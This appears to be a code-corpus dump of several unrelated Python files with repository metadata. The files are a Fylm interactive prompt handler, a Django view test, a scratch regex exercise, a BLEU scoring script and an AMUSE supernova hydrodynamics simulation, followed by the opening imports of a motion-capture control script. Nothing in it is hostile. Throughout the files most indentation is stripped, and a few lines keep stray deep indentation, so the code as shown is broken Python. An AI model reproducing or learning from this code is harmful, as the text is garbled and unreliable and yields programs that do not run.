] |
dach.bartlomiej@gmail.com
|
546e3bf16cd2f3dc5b2c5e5f6029b4a09fddc2ce
|
6ea5c9b5786eb6bf394b092316f293406eaa8a96
|
/fylm/fylmlib/interactive.py
|
994d5feb5948790e1f545f6954c6209a94cde261
|
[
"Apache-2.0"
] |
permissive
|
codacy-badger/fylm
|
dc75866e632945b6587c2aa62e3d835de64e8874
|
1f49eb14ecc0fa257d47a4e4c6420407ece11f39
|
refs/heads/main
| 2023-03-21T22:52:17.574055
| 2021-03-16T16:13:51
| 2021-03-16T16:13:51
| 348,589,304
| 0
| 0
|
Apache-2.0
| 2021-03-17T05:24:30
| 2021-03-17T05:24:29
| null |
UTF-8
|
Python
| false
| false
| 18,088
|
py
|
# -*- coding: future_fstrings -*-
# Copyright 2018 Brandon Shelley. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interactive input handler for Fylm.
This module handles all user input during interactive mode.
Credit: https://github.com/jreyesr/better-input
ask: the main class exported by this module.
"""
from __future__ import unicode_literals, print_function
from builtins import *
import readline
import os
import fylmlib.config as config
from fylmlib.parser import parser
from fylmlib.console import console
from fylmlib.duplicates import duplicates
import fylmlib.formatter as formatter
import fylmlib.operations as ops
from fylmlib.enums import Should
class interactive:
@classmethod
def lookup(cls, film):
"""Main router for handling a known or unknown film.
Determines whether the user should be prompted to verify a
matching film, or look up an unknown one.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
if config.interactive is False:
raise Exception('Interactive mode is not enabled')
if film.should_ignore:
return cls.handle_unknown_film(film)
else:
# Search TMDb for film details (if enabled).
film.search_tmdb()
return cls.verify_film(film)
@classmethod
def handle_duplicates(cls, film):
"""Prompt the user to handle duplicates of a film.
Determines how to handle duplicates of the inbound film, either
replacing, keeping both, or skipping.
Args:
film: (Film) Current film to process
Returns:
False if deleting this or skipping this film, otherwise True
(if True, it will be processed)
"""
if config.interactive is False:
raise Exception('Interactive mode is not enabled')
# Return immediately if the film is not a duplicate
if len(film.duplicate_files) == 0:
return True
console().print_duplicate_lines(film)
choices = []
# Get exact duplicates
exact_duplicates = duplicates.find_exact(film)
# Find all lower quality duplicates that are marked as upgradable (i.e., in the upgrade table)
# TODO: This is probably very circular and could be improved a lot.
upgradable_files = [l for l in duplicates.find_lower_quality(film) if l.duplicate == Should.UPGRADE]
duplicates_to_delete = []
if len(exact_duplicates) > 0:
# If there are any exact duplicates, choose the one at the destination that would be overwritten if possible
exact = next((d for d in exact_duplicates if d.destination_path == film.destination_path), exact_duplicates[0])
duplicates_to_delete.append(exact)
# If the duplicate is smaller than the current primary file, consider it an upgrade, otherwise a replace.
(s, a) = ('Upgrade', '') if exact.size < film.primary_file.size else ('Replace', ' anyway')
choices.append(f"{s} existing film '{exact.new_filename_and_ext}'{a} ({formatter.pretty_size(exact.size)})")
else:
# If there are no upgradable files, but still duplicates detected,
# the only choice should be keep (not upgrade or replace)
if len(upgradable_files) == 0 and len(film.duplicate_files) > 0:
choices.append(f"Keep this file (and existing {formatter.pluralize('film', len(film.duplicate_files))})")
else:
choices.append(f"Upgrade {len(upgradable_files)} existing lower quality {formatter.pluralize('film', len(upgradable_files))}")
duplicates_to_delete = upgradable_files
choices.extend([f"Delete this file (keep existing {formatter.pluralize('film', len(film.duplicate_files))})",
('S', '[ Skip ]')])
choice = cls._choice_input(
prompt='',
choices=choices,
default=None,
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
# Keep (move/copy) this file
if choice == 0:
film.ignore_reason = None # Reset ignore reason just in case this has changed
# If there were duplicates, and this film is upgrading/replacing, remove them
if len(duplicates_to_delete) > 0:
for d in duplicates_to_delete:
# Mark the duplicate for upgrading
d.duplicate = Should.UPGRADE
duplicates.rename_unwanted(film, duplicates_to_delete)
return True
# Delete this file (last choice is always skip, second last is delete)
elif choice == len(choices) - 2:
# Ask user to confirm destructive action
console().print_ask(
f"Are you sure you want to delete '{film.source_path}?'")
confirm_delete = cls._choice_input(
prompt='',
choices=['Yes – delete it', 'No – keep it'],
default=None,
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if confirm_delete == 0:
cls.delete_and_keep_existing(film)
return False
# Skipping (or default)
else:
return False
@classmethod
def delete_and_keep_existing(cls, film):
"""Keep the current duplicate instead of the current film
Args:
film: (Film) Current film being processed, to be deleted
"""
if film.is_folder:
ops.dirops.delete_dir_and_contents(film.source_path, max_size=-1)
else:
ops.fileops.delete(film.source_path)
@classmethod
def verify_film(cls, film):
"""Prompt the user to verify whether the best match is correct.
Ask the user to verify that the currently detected TMDb match
is correct, and offer choices that let the user search or look
up a different title.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
# TODO: When a bad lookup is found (Mars Quest for Life 1080p (2009).mkv), if fixed by a good match, should be green in interactive rename, not red
console().print_search_result(film)
if len(film.matches) > 0:
console().print_ask('Is this correct? [Y]')
choice = cls._choice_input(
prompt='',
choices=[
('Y', 'Yes'),
('N', 'No, search by name'),
('I', 'No, lookup by ID'),
('S', '[ Skip ]')],
default='Y',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
film.tmdb_verified = (choice == 0)
if choice == 1:
return cls.search_by_name(film)
elif choice == 2:
return cls.lookup_by_id(film)
elif choice == 3:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
else:
# User is happy with the result, verify
return film.tmdb_verified
else:
console().print_ask('No matches found')
choice = cls._choice_input(
prompt='',
choices=[
('N', 'Search by name'),
('I', 'Lookup by ID'),
('S', '[ Skip ]')],
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if choice == 0:
return cls.search_by_name(film)
elif choice == 1:
return cls.lookup_by_id(film)
elif choice == 2:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
@classmethod
def handle_unknown_film(cls, film):
"""Ask the user whether an unknown film should be manually
searched for or skipped.
Args:
film: (Film) Current film to process
Returns:
True if the film should be processed, else False
"""
console().print_ask(f"{film.ignore_reason} [N]")
# Continuously loop this if an invalid choice is entered.
while True:
choice = cls._choice_input(
prompt='',
choices=[
('N', 'Search by name'),
('I', 'Lookup by ID'),
('S', '[ Skip ]')],
default='N',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
if choice == 0:
return cls.search_by_name(film)
elif choice == 1:
return cls.lookup_by_id(film)
elif choice == 2:
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
@classmethod
def lookup_by_id(cls, film):
"""Perform an interactive lookup of a film by ID.
Ask the user for a TMDb ID, then perform a search for that ID.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
while True:
# Delete the existing ID in case it is a mismatch.
film.tmdb_id = None
search = cls._simple_input('TMDb ID: ', mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
try:
# Attempt to convert the search query to an int and update
# the film.
film.tmdb_id = int(search)
try:
# Search for the new film by ID.
film.search_tmdb()
# Verify the search result.
return cls.verify_film(film)
except Exception as e:
console().print_interactive_error("Hrm, that ID doesn't exist")
console.debug(e)
except Exception as e:
console().print_interactive_error("A TMDb ID must be a number")
console.debug(e)
@classmethod
def search_by_name(cls, film):
"""Perform an interactive name search.
Ask the user for a search query, then perform a search for title, and,
if detected, year.
Args:
film: (Film) Current film to process
Returns:
True or False, passing the return value from choose_from_matches
"""
# Delete the existing ID in case it is a mismatch.
film.tmdb_id = None
query = cls._simple_input("Search TMDb: ",
f"{film.title or ''}{' ' if film.title else ''}{film.year or ''}",
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
film.title = parser.get_title(query)
film.year = parser.get_year(query)
film.search_tmdb()
return cls.choose_from_matches(film, query)
@classmethod
def choose_from_matches(cls, film, query):
"""Choose the correct film from a set of matches.
Ask the user for input, then map the selected film to the
current film object.
Args:
film: (Film) Current film to process
Returns:
True if the film passes verification, else False
"""
        # If no matches were found, hand off to handle_unknown_film, which prompts the user.
        if len(film.matches) == 0:
            return cls.handle_unknown_film(film)
console().indent().bold().white('Search results:').print()
# Generate a list of choices based on search results and save the input
# to `choice`.
choice = cls._choice_input(
prompt="",
choices=[f"{m.proposed_title} ({m.proposed_year}) [{m.tmdb_id}]" for m in film.matches] +
['[ New search ]', '[ Search by ID ]', '[ Skip ]'],
enumeration='number',
mock_input=_first(config.mock_input))
config.mock_input = _shift(config.mock_input)
# If 'Edit search' was selected, try again, then forward
# the return value.
if choice == len(film.matches):
return cls.search_by_name(film)
# If 'Search by ID' was selected, redirect to ID lookup, then forward
# the return value.
elif choice == len(film.matches) + 1:
return cls.lookup_by_id(film)
# If skipping, return False
elif choice == len(film.matches) + 2:
film.tmdb_id = None
film.ignore_reason = 'Skipped'
console().print_interactive_skipped()
return False
# If we haven't returned yet, update the film with the selected match
# and mark it as verified.
film.update_with_match(film.matches[choice])
film.tmdb_verified = True
console().print_search_result(film)
return True
@classmethod
def _simple_input(cls, prompt, prefill='', mock_input=None):
"""Simple prompt for input
Ask the user for input. Extremely thin wrapper around the common input() function
Args:
prompt: (str) Text printed to standard output before reading input
prefill: (str) Prefilled text
mock_input: (char) A mock input response for tests
Returns:
The user's input
"""
if mock_input is not None:
return mock_input
readline.set_startup_hook(lambda: readline.insert_text(prefill))
try:
return console.get_input(prompt)
finally:
readline.set_startup_hook()
@classmethod
def _condition_input(cls, prompt, default, prefill='', return_type=str, condition=None, error_message=None, mock_input=None):
"""Conditional prompt for input using lambda to verify condition.
Ask the user for input, checking if it meets a condition function.
Args:
prompt: (str) The question the user will be asked
return_type: (type) The type the user's input will be casted to
condition: (optional lambda function) An optional check, done AFTER the type cast
error_message: (str) An optional error message to be shown when an input does not meet the condition
mock_input: (char) A mock input response for tests
Returns:
The user's input, casted to return_type and complying with condition
"""
while True:
try:
answer = return_type(cls._simple_input(prompt, prefill, mock_input=mock_input))
except ValueError:
print(error_message)
continue
if answer == '' and default is not None:
answer = default
if condition is not None:
if condition(answer):
return answer
elif mock_input is not None:
raise ValueError(str(mock_input) + ' is not a valid mock value')
else:
return answer
if error_message is not None:
print(error_message)
@classmethod
def _choice_input(cls, prompt, choices, default=None, prefill='', enumeration='char', error_message=None, mock_input=None):
"""Choice-based prompt for input.
Ask the user for input from a set of choices.
Args:
prompt: (str) The question the user will be asked
choices: (list(str)) A list of choices the user has to select from
enumeration: (str) Can be 'number' or 'char'. 'char' should only be used when len(choices)<27
error_message: (str) An optional error message to be shown when an input is not a valid choice
mock_input: (char) A mock input response for tests
Returns:
The index of the selected choice
"""
if enumeration == 'number':
chars = [str(x + 1) for x in range(len(choices))]
elif enumeration == 'char':
            assert len(choices) < 27, "Too many choices to be represented by single letters"
chars = [x[0].title() if isinstance(x, tuple) else x[:1].title() for x in choices]
choices = [x[1] if isinstance(x, tuple) else x for x in choices]
else:
raise ValueError("enumeration is not 'number' or 'char'")
for idx, choice in zip(chars, choices):
console().print_choice(idx, choice)
answer = cls._condition_input(
prompt,
condition=lambda x: x.upper() in chars,
default=default,
prefill=prefill,
error_message=error_message,
mock_input=mock_input)
return chars.index(answer.upper())
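# Illustrative sketch (not from the original module; the class name "Interactive" is assumed
# here purely for demonstration): a 'char'-enumerated prompt built from (key, label) tuples.
#
#   idx = Interactive._choice_input(
#       prompt='',
#       choices=[('Y', 'Yes, continue'), ('N', 'No, search by name'), ('S', '[ Skip ]')],
#       default='Y',
#       enumeration='char')
#   # Prints one "K) label" line per choice and returns the index (0, 1 or 2) of the key the
#   # user typed, falling back to the default 'Y' (index 0) on an empty answer.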
def _shift(l):
try:
l.pop(0)
except Exception:
pass
return l
def _first(l):
try:
return l[0]
except Exception:
return l
|
[
"brandon@behemoth.ca"
] |
brandon@behemoth.ca
|
94de14f357e70da795981af25394211200312198
|
921c29354a9065a4f76f816c2b2ec68457f66aef
|
/todo/tests/test_list.py
|
59b1f2108648872be5f06b3a9d1e6a70268cc39f
|
[] |
no_license
|
AmrAnwar/ToDoList
|
520fa0529090183832dfd8c274fb3e7dad4d7a3b
|
de5e9e9887dee857e6169184aa9c7b74f31d32c4
|
refs/heads/master
| 2020-04-11T15:51:39.869491
| 2018-12-15T17:20:11
| 2018-12-15T17:20:11
| 161,905,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
from django.core.urlresolvers import reverse
from .test_init import InitTest
from ..models import List, Task, Code
class TestList(InitTest):
def setUp(self):
super(TestList, self).setUp()
def test_lists_view(self):
self.assertEqual(self.client.get(reverse('lists-list')).status_code, 302)
res = self.client.get(self.list.get_absolute_url())
self.assertEqual(res.status_code, 404)
self.client.login(username='guest', password='password')
res = self.client.get(reverse('lists-list'))
self.assertEqual(res.status_code, 200)
res = self.client.get(self.list.get_absolute_url())
self.assertEqual(res.status_code, 200)
# def test_form_valid(self):
# self.client.login(username='guest', password='password')
# data = {
# 'title': 'mylist'
# }
# count = List.objects.count()
# self.client.post(reverse("lists-list"), data=data)
# self.assertEqual(count+1, List.objects.count())
|
[
"amranwar945@gmail.com"
] |
amranwar945@gmail.com
|
7ddceea06214f7c2ad30fe2c4a2fe49f3644880a
|
c658bd535bad0ee0bbb3be94d624ba0f2dda284f
|
/src/summarization_models/models/codebert/bleu.py
|
dc7df4a9b3577639bdfc114656d6ef6cb429417a
|
[] |
no_license
|
Anonymous-ICSE-2022/ICSE2022_submission
|
fa2de62091f95eeb4575f75811dbaf2d3e970efb
|
8b1879b6b33dbd670af5c091c9bffb1f098bc868
|
refs/heads/main
| 2023-07-31T21:49:23.399103
| 2021-09-19T16:15:05
| 2021-09-19T16:15:05
| 397,334,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,916
|
py
|
'''
This script was adapted from the original version by hieuhoang1972 which is part of MOSES.
'''
# $Id: bleu.py 1307 2007-03-14 22:22:36Z hieuhoang1972 $
'''Provides:
cook_refs(refs, n=4): Transform a list of reference sentences as strings into a form usable by cook_test().
cook_test(test, refs, n=4): Transform a test sentence as a string (together with the cooked reference sentences) into a form usable by score_cooked().
score_cooked(alltest, n=4): Score a list of cooked test sentences.
score_set(s, testid, refids, n=4): Interface with dataset.py; calculate BLEU score of testid against refids.
The reason for breaking the BLEU computation into three phases cook_refs(), cook_test(), and score_cooked() is to allow the caller to calculate BLEU scores for multiple test sets as efficiently as possible.
'''
import math
import os
import re
import subprocess
import sys
import xml.sax.saxutils
# Added to bypass NIST-style pre-processing of hyp and ref files -- wade
nonorm = 0
preserve_case = False
eff_ref_len = "shortest"
normalize1 = [
('<skipped>', ''), # strip "skipped" tags
(r'-\n', ''), # strip end-of-line hyphenation and join lines
(r'\n', ' '), # join lines
# (r'(\d)\s+(?=\d)', r'\1'), # join digits
]
normalize1 = [(re.compile(pattern), replace) for (pattern, replace) in normalize1]
normalize2 = [
(r'([\{-\~\[-\` -\&\(-\+\:-\@\/])',r' \1 '), # tokenize punctuation. apostrophe is missing
(r'([^0-9])([\.,])',r'\1 \2 '), # tokenize period and comma unless preceded by a digit
(r'([\.,])([^0-9])',r' \1 \2'), # tokenize period and comma unless followed by a digit
(r'([0-9])(-)',r'\1 \2 ') # tokenize dash when preceded by a digit
]
normalize2 = [(re.compile(pattern), replace) for (pattern, replace) in normalize2]
def normalize(s):
'''Normalize and tokenize text. This is lifted from NIST mteval-v11a.pl.'''
# Added to bypass NIST-style pre-processing of hyp and ref files -- wade
if (nonorm):
return s.split()
if type(s) is not str:
s = " ".join(s)
# language-independent part:
for (pattern, replace) in normalize1:
s = re.sub(pattern, replace, s)
s = xml.sax.saxutils.unescape(s, {'"':'"'})
# language-dependent part (assuming Western languages):
s = " %s " % s
if not preserve_case:
s = s.lower() # this might not be identical to the original
for (pattern, replace) in normalize2:
s = re.sub(pattern, replace, s)
return s.split()
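# Illustrative note (not from the original script): with the default settings, normalize()
# lower-cases the text, separates punctuation and returns a token list, e.g.
#   normalize('He said, "Hi."')  ->  ['he', 'said', ',', '"', 'hi', '.', '"']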
def count_ngrams(words, n=4):
counts = {}
for k in range(1,n+1):
for i in range(len(words)-k+1):
ngram = tuple(words[i:i+k])
counts[ngram] = counts.get(ngram, 0)+1
return counts
def cook_refs(refs, n=4):
'''Takes a list of reference sentences for a single segment
and returns an object that encapsulates everything that BLEU
needs to know about them.'''
refs = [normalize(ref) for ref in refs]
maxcounts = {}
for ref in refs:
counts = count_ngrams(ref, n)
for (ngram,count) in counts.items():
maxcounts[ngram] = max(maxcounts.get(ngram,0), count)
return ([len(ref) for ref in refs], maxcounts)
def cook_test(test, item, n=4):
'''Takes a test sentence and returns an object that
encapsulates everything that BLEU needs to know about it.'''
(reflens, refmaxcounts)=item
test = normalize(test)
result = {}
result["testlen"] = len(test)
# Calculate effective reference sentence length.
if eff_ref_len == "shortest":
result["reflen"] = min(reflens)
elif eff_ref_len == "average":
result["reflen"] = float(sum(reflens))/len(reflens)
elif eff_ref_len == "closest":
min_diff = None
for reflen in reflens:
if min_diff is None or abs(reflen-len(test)) < min_diff:
min_diff = abs(reflen-len(test))
result['reflen'] = reflen
result["guess"] = [max(len(test)-k+1,0) for k in range(1,n+1)]
result['correct'] = [0]*n
counts = count_ngrams(test, n)
for (ngram, count) in counts.items():
result["correct"][len(ngram)-1] += min(refmaxcounts.get(ngram,0), count)
return result
def score_cooked(allcomps, n=4, ground=0, smooth=1):
totalcomps = {'testlen':0, 'reflen':0, 'guess':[0]*n, 'correct':[0]*n}
for comps in allcomps:
for key in ['testlen','reflen']:
totalcomps[key] += comps[key]
for key in ['guess','correct']:
for k in range(n):
totalcomps[key][k] += comps[key][k]
logbleu = 0.0
all_bleus = []
for k in range(n):
correct = totalcomps['correct'][k]
guess = totalcomps['guess'][k]
addsmooth = 0
if smooth == 1 and k > 0:
addsmooth = 1
logbleu += math.log(correct + addsmooth + sys.float_info.min)-math.log(guess + addsmooth+ sys.float_info.min)
if guess == 0:
all_bleus.append(-10000000)
else:
all_bleus.append(math.log(correct + sys.float_info.min)-math.log( guess ))
logbleu /= float(n)
all_bleus.insert(0, logbleu)
brevPenalty = min(0,1-float(totalcomps['reflen'] + 1)/(totalcomps['testlen'] + 1))
for i in range(len(all_bleus)):
        if i == 0:
all_bleus[i] += brevPenalty
all_bleus[i] = math.exp(all_bleus[i])
return all_bleus
def bleu(refs, candidate, ground=0, smooth=1):
refs = cook_refs(refs)
test = cook_test(candidate, refs)
return score_cooked([test], ground=ground, smooth=smooth)
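# Illustrative sketch (not from the original script): the three-phase API described in the
# module docstring lets several candidates be scored against the same references without
# re-cooking them each time. The helper below is a hedged example and is never called here.
def _example_multi_candidate_bleu(refs, candidates):
    cooked_refs = cook_refs(refs)                                    # phase 1: cook the references once
    cooked_tests = [cook_test(c, cooked_refs) for c in candidates]   # phase 2: cook each candidate sentence
    return score_cooked(cooked_tests)                                # phase 3: aggregate BLEU components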
def splitPuncts(line):
return ' '.join(re.findall(r"[\w]+|[^\s\w]", line))
def computeMaps(predictions, goldfile):
predictionMap = {}
goldMap = {}
gf = open(goldfile, 'r')
for row in predictions:
cols = row.strip().split('\t')
if len(cols) == 1:
(rid, pred) = (cols[0], '')
else:
(rid, pred) = (cols[0], cols[1])
predictionMap[rid] = [splitPuncts(pred.strip().lower())]
for row in gf:
(rid, pred) = row.split('\t')
if rid in predictionMap: # Only insert if the id exists for the method
if rid not in goldMap:
goldMap[rid] = []
goldMap[rid].append(splitPuncts(pred.strip().lower()))
sys.stderr.write('Total: ' + str(len(goldMap)) + '\n')
return (goldMap, predictionMap)
#m1 is the reference map
#m2 is the prediction map
def bleuFromMaps(m1, m2):
score = [0] * 5
num = 0.0
for key in m1:
if key in m2:
bl = bleu(m1[key], m2[key][0])
score = [ score[i] + bl[i] for i in range(0, len(bl))]
num += 1
return [s * 100.0 / num for s in score]
if __name__ == '__main__':
reference_file = sys.argv[1]
predictions = []
for row in sys.stdin:
predictions.append(row)
(goldMap, predictionMap) = computeMaps(predictions, reference_file)
print (bleuFromMaps(goldMap, predictionMap)[0])
|
[
""
] | |
a38c1a112526984dc7ad1084e7a9f0aacc58d696
|
0659bf3ea0b4560074345ad29fe7cae549a8d029
|
/testrun.py
|
69b57e5ad0865991518f5992d1fd21568d3f816d
|
[] |
no_license
|
alankrit03/Problem_Solving
|
a63df4fc10c3b318341a3e37fef7fe1256c4b688
|
9964e2fbe97d08aa1647b2d64412607039b5bffb
|
refs/heads/master
| 2021-01-08T17:28:17.984540
| 2020-08-07T06:14:17
| 2020-08-07T06:14:17
| 242,094,556
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 972
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 19:10:51 2019
@author: Alankrit Agarwal
"""
import re
m = re.match(r'(?P<user>\w+)@(?P<website>\w+)\.(?P<extension>\w+)','alankrit@hackerrank.com')
print(m.groupdict())
lst=re.fullmatch
s='alankrit'
pat=r'al'
t=re.sub(pat,'new',s)
print(s,t,sep='\n')
def test():
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re
for _ in range(int(input())):
s=input()
not_allowed_char=r'[^0-9-]'
if re.search(not_allowed_char,s):
print("Invalid")
else:
nor_pat=r'^[456]{1}[0-9]{15}' #checking for normal code without any dashes
if re.search(nor_pat,s):
                if re.search(r'(\d)\1{4,}',s):
print("Invalid")
else:
pass
print("VAl")
pattern = r"Cookie"
sequence = "Cooki8e7"
if re.match(pattern, sequence):
print("Match!")
else: print("Not a match!")
|
[
"alankritagarwal9@gmail.com"
] |
alankritagarwal9@gmail.com
|
24354294eca3956b51129456dbfee5bb9fc841d8
|
bfb6ccbcb2707bca5eb44f2b64c0084aa6561b5a
|
/docs/examples/textbook/supernova_grid.py
|
45329e4f46a5dc12c888d92335755d81eac53405
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
cgroeneveld/amuse
|
79c8ece558f484df4494609e95274cffd5c37c60
|
9684fd22ce8293b837d2c78f56948e3ec3d04032
|
refs/heads/master
| 2020-08-16T16:44:46.702465
| 2019-10-14T19:16:04
| 2019-10-14T19:16:04
| 215,526,071
| 0
| 0
|
Apache-2.0
| 2019-10-16T10:57:34
| 2019-10-16T10:57:34
| null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
import numpy
from amuse.lab import *
#from amuse import plot
from amuse.ext import cloud
from matplotlib import pyplot
from amuse import datamodel
from amuse.ext.sph_to_grid import convert_SPH_to_grid
from amuse.community.capreole.interface import Capreole
from amuse.units.generic_unit_converter import ConvertBetweenGenericAndSiUnits
def plot_grid(grid, time= 0.0|units.day):
pyplot.rcParams.update({'font.size': 30})
figure = pyplot.figure(figsize=(12, 12))
halfway = len(grid.rho[...,0,0])/2
rho = grid.rho[:,:,halfway].value_in(units.g/units.cm**3)
print "Extrema density:", halfway, rho.min(), rho.max()
max_dens = rho.max()
# max_dens = 32
plot = figure.add_subplot(1,1,1)
# cax = plot.imshow(rho, interpolation='nearest', origin = 'lower', extent=[-5, 5, -5, 5], cmap="hot")
cax = plot.imshow(rho, interpolation='bicubic', origin = 'lower', extent=[-5, 5, -5, 5], cmap="hot")
cbar = figure.colorbar(cax, ticks=[1.e-8, 0.5*max_dens, max_dens], orientation='vertical', fraction=0.045)
rmin = 0.0
rmid = "%.1f" % (0.5*max_dens)
rmax = "%.1f" % (max_dens)
# cbar.ax.set_yticklabels(['Low', ' ', 'High']) # horizontal colorbar
cbar.ax.set_yticklabels([rmin, ' ', rmax]) # horizontal colorbar
cbar.set_label('mid-plane density [$g/cm^3$]', rotation=270)
pyplot.xlabel("x [R$_\odot$]")
pyplot.ylabel("y [R$_\odot$]")
t = int(time.value_in(units.s))
filename = "supernova_grid_T"+str(t)+".png"
figure.savefig(filename)
# pyplot.show()
def setup_sph_code(sph_code, N, L, rho, u):
converter = ConvertBetweenGenericAndSiUnits(L, rho, constants.G)
sph_code = sph_code(converter, mode = 'periodic')#, redirection = 'none')
sph_code.parameters.periodic_box_size = 10.0 | units.parsec
plummer = new_plummer_gas_model(N, convert_nbody=converter)
plummer = plummer.select(lambda r: r.length()<0.5*L,["position"])
N = len(plummer)
print "N=", len(plummer)
plummer.mass = (rho * L**3) / N
gas = Particles(N)
gas.mass = 0.001*(rho * L**3) / N
numpy.random.seed(12345)
gas.x = L * numpy.random.uniform(0.0, 1.0, N)
gas.y = L * numpy.random.uniform(0.0, 1.0, N)
gas.z = L * numpy.random.uniform(0.0, 1.0, N)
gas.vx = numpy.zeros(N) | units.cm / units.s
gas.vy = numpy.zeros(N) | units.cm / units.s
gas.vz = numpy.zeros(N) | units.cm / units.s
gas.u = u
if isinstance(sph_code, Fi):
sph_code.parameters.self_gravity_flag = False
sph_code.parameters.timestep = 0.1 | generic_unit_system.time
gas.h_smooth = L / N**(1/3.0)
gas.position -= 0.5 * L
sph_code.gas_particles.add_particles(gas)
sph_code.gas_particles.add_particles(plummer)
sph_code.commit_particles()
return sph_code
def main(stellar_mass, stellar_radius, core_mass, core_radius, t_end, dt, resolution):
grid_size = 10 * stellar_radius
hydro = initialize_grid_code(resolution, grid_size)
grid = initialize_grid(stellar_mass, stellar_radius, core_mass, core_radius, resolution, grid_size)
cth = grid.new_channel_to(hydro.grid)
cth.copy()
hydro.initialize_grid()
run_grid_code(hydro, grid, t_end, dt)
def initialize_grid_code(resolution, grid_size):
converter = nbody_system.nbody_to_si(1|units.MSun, 1|units.RSun)
instance = Athena(converter, number_of_workers=4)
instance.initialize_code()
instance.parameters.gamma = 5/3.0
instance.parameters.courant_number=0.3
instance.parameters.nx = resolution
instance.parameters.ny = resolution
instance.parameters.nz = resolution
instance.parameters.length_x = grid_size
instance.parameters.length_y = grid_size
instance.parameters.length_z = grid_size
instance.x_boundary_conditions = ("outflow", "outflow")
instance.y_boundary_conditions = ("outflow", "outflow")
instance.z_boundary_conditions = ("outflow", "outflow")
instance.commit_parameters()
return instance
def initialize_grid(stellar_mass, stellar_radius, core_mass, core_radius, resolution, grid_size):
n = resolution
r = grid_size.value_in(units.RSun)
grid = datamodel.new_regular_grid((n,n,n), [r, r, r] | units.RSun)
momentum = units.kg / (units.s * units.m**2)
grid_size = units.RSun
energy_density = units.erg / grid_size**3
supernova_energy = 1.e+51 | units.erg
stellar_energy_density = 0.01*supernova_energy/stellar_radius**3
supernova_energy_density = supernova_energy/core_radius**3
stellar_density = stellar_mass/stellar_radius**3
grid.rho = 1.e-10 * stellar_density
grid.rhovx = 0.0 | momentum
grid.rhovy = 0.0 | momentum
grid.rhovz = 0.0 | momentum
grid.energy = 1 | energy_density
datamodel.Grid.add_global_vector_attribute("position", ["x","y","z"])
cloud.fill_grid_with_spherical_cloud(
grid,
center = [5.0, 5.0, 5.0] | units.RSun,
radius = stellar_radius,
rho = stellar_density,
rhovx = 0.0 | momentum,
rhovy = 0.0 | momentum,
rhovz = 0.0 | momentum,
energy = stellar_energy_density
)
cloud.fill_grid_with_spherical_cloud(
grid,
center = [5.0, 5.0, 5.0] | units.RSun,
radius = core_radius,
rho = core_mass/core_radius**3,
rhovx = 0.0 | momentum,
rhovy = 0.0 | momentum,
rhovz = 0.0 | momentum,
energy = supernova_energy_density
#subgridsize = 16,
)
return grid
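# Illustrative note (not from the original example): the grid starts as a low-density
# background, is then overwritten by a sphere of stellar density and modest thermal energy
# out to stellar_radius, and finally by a much hotter core sphere out to core_radius, so the
# 1e51 erg supernova energy is concentrated in the innermost region.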
def run_grid_code(hydro, grid, t_end, dt):
ctg = hydro.grid.new_channel_to(grid)
ctg.copy()
plot_grid(grid)
while hydro.model_time<t_end:
print "Time=", hydro.model_time.in_(units.s)
hydro.evolve_model(hydro.model_time + dt)
ctg.copy()
plot_grid(grid, hydro.model_time)
hydro.stop()
def new_option_parser():
from amuse.units.optparse import OptionParser
result = OptionParser()
result.add_option("-t", unit=units.s,
dest="t_end", type="float", default = 300.0|units.s,
help="end time of the simulation [%default]")
result.add_option("-d", unit=units.s,
dest="dt", type="float", default = 50.0|units.s,
help="diagnostic time step [%default]")
result.add_option("-M", unit=units.MSun,
dest="stellar_mass", type="float", default = 3|units.MSun,
help="Mass of the star [%default]")
result.add_option("-R", unit=units.RSun,
dest="stellar_radius", type="float", default = 1|units.RSun,
help="Radius of the star [%default]")
result.add_option("-m", unit=units.MSun,
dest="core_mass", type="float", default = 1.4|units.MSun,
help="Mass of the stellar core [%default]")
result.add_option("-n",
dest="resolution", type="int", default = 256,
help="Resolution of the grid [%default]")
result.add_option("-r", unit=units.RSun,
dest="core_radius", type="float", default = 0.1|units.RSun,
help="Radius of the stellar core [%default]")
return result
if __name__ in ('__main__', '__plot__'):
o, arguments = new_option_parser().parse_args()
main(**o.__dict__)
|
[
"steven@rieder.nl"
] |
steven@rieder.nl
|
815554f3d7dd47f3a7f9a275ca23544ae727e1b8
|
460cb457a056fcd2140eb78d2ae9bdc90c298919
|
/control.py
|
15f49ec341fa9f67ac91f8ac436aa7b196aef08f
|
[
"MIT"
] |
permissive
|
jonathanzxu/mocap-roboticarm
|
3b4f2e2fbf4bd541ba83b3ebdf6ab4e44424e9dd
|
957f77249766c1b40b8416a9236a2c60c734e3cd
|
refs/heads/main
| 2023-07-11T10:08:48.137661
| 2021-08-13T23:05:50
| 2021-08-13T23:05:50
| 393,493,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,508
|
py
|
import math
import numpy as np
import owl
import time
import matplotlib.pyplot as plt
import matplotlib.animation as anim
